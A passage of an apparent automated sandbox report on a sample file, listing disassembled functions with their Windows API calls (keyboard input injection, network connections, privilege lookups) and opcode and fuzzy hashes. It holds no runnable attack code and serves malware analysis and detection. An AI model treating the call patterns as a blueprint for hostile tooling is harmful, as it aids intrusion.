                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00ACBB09
                                                      • GetLastError.KERNEL32(?,00000000), ref: 00ACBB2F
                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00ACBB54
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00ACBB80
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                      • String ID:
                                                      • API String ID: 3321077145-0
                                                      • Opcode ID: c773d054c4be11b59bd802f98690b5d5eeb0beb408f01d689da2c1fe13f8cc40
                                                      • Instruction ID: a1cbcc6699cb563908073a5e4a16cd3d8a59e64a2be3f73320c656e910d5626d
                                                      • Opcode Fuzzy Hash: c773d054c4be11b59bd802f98690b5d5eeb0beb408f01d689da2c1fe13f8cc40
                                                      • Instruction Fuzzy Hash: 9B41143A600650DFCB10EF55C685A5ABBF5EF89320B098498E84A9F362CB35FD01CB91
                                                      Function 00AE8AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00AE8B4D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: InvalidateRect
                                                      • String ID:
                                                      • API String ID: 634782764-0
                                                      • Opcode ID: ef53bc1aa6da2248f775791c04dbe6d999bdb510c79c88d3b54a57e0bc5925b0
                                                      • Instruction ID: 907db56b720bbd0aac7fb55d22468178df86a26091281e37376b7576238d8907
                                                      • Opcode Fuzzy Hash: ef53bc1aa6da2248f775791c04dbe6d999bdb510c79c88d3b54a57e0bc5925b0
                                                      • Instruction Fuzzy Hash: 0E31C4B46012C8BFEF209F5ACC85FAD37A5EB05350F244616FA59DB2E0CF39A9409751
                                                      Function 00AEADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ClientToScreen.USER32(?,?), ref: 00AEAE1A
                                                      • GetWindowRect.USER32(?,?), ref: 00AEAE90
                                                      • PtInRect.USER32(?,?,00AEC304), ref: 00AEAEA0
                                                      • MessageBeep.USER32(00000000), ref: 00AEAF11
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                      • String ID:
                                                      • API String ID: 1352109105-0
                                                      • Opcode ID: a9a81a6206809af15d84b198f478d5c88d55d6c819a0f2101b825c9529238790
                                                      • Instruction ID: 09ba1d13f65412812aa8f0cbee34136403a844e18659ec9af5513f932f281eee
                                                      • Opcode Fuzzy Hash: a9a81a6206809af15d84b198f478d5c88d55d6c819a0f2101b825c9529238790
                                                      • Instruction Fuzzy Hash: 20418D706001A9DFCB21CF6AC884B69BBF5FF68740F1881A9E8149F251D730B802CF92
                                                      Function 00AC0FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00AC1037
                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00AC1053
                                                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00AC10B9
                                                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00AC110B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: 8d1bdbe6c5cebbb43983618de6084e1355ad4fbdcd41f36873d081a829931535
                                                      • Instruction ID: ef21b524c5af5ebf495ee209e0c9bbe9a22fcae60a35191bf4c07276afcb44c9
                                                      • Opcode Fuzzy Hash: 8d1bdbe6c5cebbb43983618de6084e1355ad4fbdcd41f36873d081a829931535
                                                      • Instruction Fuzzy Hash: C9312430B40688AEFB308B658C05FFABBA9AB47320F09421EE590561D2C37489C29762
                                                      Function 00AC1121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?,7608C0D0,?,00008000), ref: 00AC1176
                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00AC1192
                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00AC11F1
                                                      • SendInput.USER32(00000001,?,0000001C,7608C0D0,?,00008000), ref: 00AC1243
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: 7ecebd3a0fc0e54b9067daf581fd33a7b249030a2d0fb34250b0663329997fcc
                                                      • Instruction ID: 1fff28ce4150e7dc39472b7f6337eb039f4150ce65065dd3ced2fbd1d9436872
                                                      • Opcode Fuzzy Hash: 7ecebd3a0fc0e54b9067daf581fd33a7b249030a2d0fb34250b0663329997fcc
                                                      • Instruction Fuzzy Hash: 27312B30B406489EEF34CBA58C08FFABB79AB46310F19435EE590921D2C33849559751
                                                      Function 00A96415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A9644B
                                                      • __isleadbyte_l.LIBCMT ref: 00A96479
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00A964A7
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00A964DD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                      • String ID:
                                                      • API String ID: 3058430110-0
                                                      • Opcode ID: 3c8ce2843dc60dff175840a2789f7bd61c738a447fbef4700d30648205bc5519
                                                      • Instruction ID: 6458c7962495491239dfffbc67bbb5b4ee43c8455fae0de6e633e6f11ea27f1f
                                                      • Opcode Fuzzy Hash: 3c8ce2843dc60dff175840a2789f7bd61c738a447fbef4700d30648205bc5519
                                                      • Instruction Fuzzy Hash: 2B31CF31700256AFDF21CFB5CA45BAA7BF5FF80310F154129E8548B1A1EB31D851DB90
                                                      Function 00AE5175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 00AE5189
                                                        • Part of subcall function 00AC387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00AC3897
                                                        • Part of subcall function 00AC387D: GetCurrentThreadId.KERNEL32 ref: 00AC389E
                                                        • Part of subcall function 00AC387D: AttachThreadInput.USER32(00000000,?,00AC52A7), ref: 00AC38A5
                                                      • GetCaretPos.USER32(?), ref: 00AE519A
                                                      • ClientToScreen.USER32(00000000,?), ref: 00AE51D5
                                                      • GetForegroundWindow.USER32 ref: 00AE51DB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                      • String ID:
                                                      • API String ID: 2759813231-0
                                                      • Opcode ID: 1c9aab040fd6e4f8d73f35874bb67aa10fef847c0de10e276c237e9f969e819c
                                                      • Instruction ID: 325057a45eb77adf00fc9fd7d224ce5394aed67c09e59efa956f3b320e2f1dd7
                                                      • Opcode Fuzzy Hash: 1c9aab040fd6e4f8d73f35874bb67aa10fef847c0de10e276c237e9f969e819c
                                                      • Instruction Fuzzy Hash: 39310A72900108AFDB00EFA5C985AEFB7FDEF98304F11406AE415E7241EA759E45CBA1
                                                      Function 00AEC788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A62612: GetWindowLongW.USER32(?,000000EB), ref: 00A62623
                                                      • GetCursorPos.USER32(?), ref: 00AEC7C2
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00A9BBFB,?,?,?,?,?), ref: 00AEC7D7
                                                      • GetCursorPos.USER32(?), ref: 00AEC824
                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00A9BBFB,?,?,?), ref: 00AEC85E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                      • String ID:
                                                      • API String ID: 2864067406-0
                                                      • Opcode ID: d9b6ffa974424a63426dd65c80432ae38dbda7b8ff9026a853c4c5f2cd850bde
                                                      • Instruction ID: bbb53b3bf14c542079027de2db29cb7cf1f419b779d093e4cde12c56c0d2033b
                                                      • Opcode Fuzzy Hash: d9b6ffa974424a63426dd65c80432ae38dbda7b8ff9026a853c4c5f2cd850bde
                                                      • Instruction Fuzzy Hash: C4317135600098AFCB25CF99C998EEE7BB6FB49720F0441A9F9058B261C7319D52DFA0
                                                      Function 00AB8B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00AB8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AB8669
                                                        • Part of subcall function 00AB8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AB8673
                                                        • Part of subcall function 00AB8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AB8682
                                                        • Part of subcall function 00AB8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AB8689
                                                        • Part of subcall function 00AB8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AB869F
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00AB8BEB
                                                      • _memcmp.LIBCMT ref: 00AB8C0E
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AB8C44
                                                      • HeapFree.KERNEL32(00000000), ref: 00AB8C4B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                      • String ID:
                                                      • API String ID: 1592001646-0
                                                      • Opcode ID: d6da3f0c7115dcf1681e7200b6569c2d1ae424b44a3d7adb34a7c1a6d60eed5a
                                                      • Instruction ID: dadd5d6f6fee78f5c9a87b7c4db1676b6433eb7ee688e2096099842fb7036c5b
                                                      • Opcode Fuzzy Hash: d6da3f0c7115dcf1681e7200b6569c2d1ae424b44a3d7adb34a7c1a6d60eed5a
                                                      • Instruction Fuzzy Hash: 0C218DB1D01208EFCB00DFA8C945BEEBBBCFF41340F144059E554AB241DB38AA06CB60
                                                      Function 00A80BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __setmode.LIBCMT ref: 00A80BF2
                                                        • Part of subcall function 00A65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00AC7B20,?,?,00000000), ref: 00A65B8C
                                                        • Part of subcall function 00A65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00AC7B20,?,?,00000000,?,?), ref: 00A65BB0
                                                      • _fprintf.LIBCMT ref: 00A80C29
                                                      • OutputDebugStringW.KERNEL32(?), ref: 00AB6331
                                                        • Part of subcall function 00A84CDA: _flsall.LIBCMT ref: 00A84CF3
                                                      • __setmode.LIBCMT ref: 00A80C5E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                      • String ID:
                                                      • API String ID: 521402451-0
                                                      • Opcode ID: f370a17c2461555a9eb4dd0a5cf0bad014d15e21971caf59cb910613ed3452d0
                                                      • Instruction ID: 1646e94faa1be71d4be458afe41ec227dcd59bdaf6c07e1565edac789abbc77e
                                                      • Opcode Fuzzy Hash: f370a17c2461555a9eb4dd0a5cf0bad014d15e21971caf59cb910613ed3452d0
                                                      • Instruction Fuzzy Hash: 511136729042097ECB15B7B49D47DBEBB7CAF49320F14011AF20497192DF345D468395
                                                      Function 00AD1A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00AD1A97
                                                        • Part of subcall function 00AD1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00AD1B40
                                                        • Part of subcall function 00AD1B21: InternetCloseHandle.WININET(00000000), ref: 00AD1BDD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Internet$CloseConnectHandleOpen
                                                      • String ID:
                                                      • API String ID: 1463438336-0
                                                      • Opcode ID: 2856e22db1c86f64ca3834281684d9309f33eb5fecc37ce087be6d475e494d2c
                                                      • Instruction ID: 11921842015b6bd4f0040cd63e8978c5368d3e8c4f62662fe5f7b564c3eaedd7
                                                      • Opcode Fuzzy Hash: 2856e22db1c86f64ca3834281684d9309f33eb5fecc37ce087be6d475e494d2c
                                                      • Instruction Fuzzy Hash: 69219F35200A01BFEB119FA08C41FBAB7A9FF94701F10401BFA5296761EB719811DBA0
                                                      Function 00ABE1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00ABF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00ABE1C4,?,?,?,00ABEFB7,00000000,000000EF,00000119,?,?), ref: 00ABF5BC
                                                        • Part of subcall function 00ABF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00ABF5E2
                                                        • Part of subcall function 00ABF5AD: lstrcmpiW.KERNEL32(00000000,?,00ABE1C4,?,?,?,00ABEFB7,00000000,000000EF,00000119,?,?), ref: 00ABF613
                                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00ABEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00ABE1DD
                                                      • lstrcpyW.KERNEL32(00000000,?), ref: 00ABE203
                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00ABEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00ABE237
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: lstrcmpilstrcpylstrlen
                                                      • String ID: cdecl
                                                      • API String ID: 4031866154-3896280584
                                                      • Opcode ID: 1928826b35de932f0503e05bb37d3d49b83b623685e8dcf6ad25fbdffde29ceb
                                                      • Instruction ID: ed31a0228b226d2668269680cfe7007af40896771f7638c07ebcb35ac29d49ce
                                                      • Opcode Fuzzy Hash: 1928826b35de932f0503e05bb37d3d49b83b623685e8dcf6ad25fbdffde29ceb
                                                      • Instruction Fuzzy Hash: 4D11AC3A200345EFCB25EF64DC459FA77BCFF84310B40812AE916CB261EB71985197A0
                                                      Function 00A95332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00A95351
                                                        • Part of subcall function 00A8594C: __FF_MSGBANNER.LIBCMT ref: 00A85963
                                                        • Part of subcall function 00A8594C: __NMSG_WRITE.LIBCMT ref: 00A8596A
                                                        • Part of subcall function 00A8594C: RtlAllocateHeap.NTDLL(01580000,00000000,00000001,00000000,?,?,?,00A81013,?), ref: 00A8598F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap_free
                                                      • String ID:
                                                      • API String ID: 614378929-0
                                                      • Opcode ID: b3f79b04a3565078293c5af1b58f9c17a30feccc8cd92f93794b1fb95b446770
                                                      • Instruction ID: 1b68b56ed0283b18df0c318b6275fae2a5b63b331abcd7666a8d027ccf8d905f
                                                      • Opcode Fuzzy Hash: b3f79b04a3565078293c5af1b58f9c17a30feccc8cd92f93794b1fb95b446770
                                                      • Instruction Fuzzy Hash: 3111E332E04A15AFCF323F70AD6666F37E8AF103A0B10442AF9059E190DF75CD419790
                                                      Function 00A64531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00A64560
                                                        • Part of subcall function 00A6410D: _memset.LIBCMT ref: 00A6418D
                                                        • Part of subcall function 00A6410D: _wcscpy.LIBCMT ref: 00A641E1
                                                        • Part of subcall function 00A6410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A641F1
                                                      • KillTimer.USER32(?,00000001,?,?), ref: 00A645B5
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A645C4
                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A9D6CE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                      • String ID:
                                                      • API String ID: 1378193009-0
                                                      • Opcode ID: 7df45708a5bd60e65478f02b100ce1b4c75c55a54a8ae80bf247e8ec3a7b01cc
                                                      • Instruction ID: 921c86579b9d218949686cecb11c6954efe793452cc8a3fc3f34aeaebfaba1d7
                                                      • Opcode Fuzzy Hash: 7df45708a5bd60e65478f02b100ce1b4c75c55a54a8ae80bf247e8ec3a7b01cc
                                                      • Instruction Fuzzy Hash: 9621A470A04784AFEB328B24DC95BE7BBFC9F05308F04009EE79E5A281C7745E859B51
                                                      Function 00AD667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00AC7B20,?,?,00000000), ref: 00A65B8C
                                                        • Part of subcall function 00A65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00AC7B20,?,?,00000000,?,?), ref: 00A65BB0
                                                      • gethostbyname.WSOCK32(?,?,?), ref: 00AD66AC
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AD66B7
                                                      • _memmove.LIBCMT ref: 00AD66E4
                                                      • inet_ntoa.WSOCK32(?), ref: 00AD66EF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
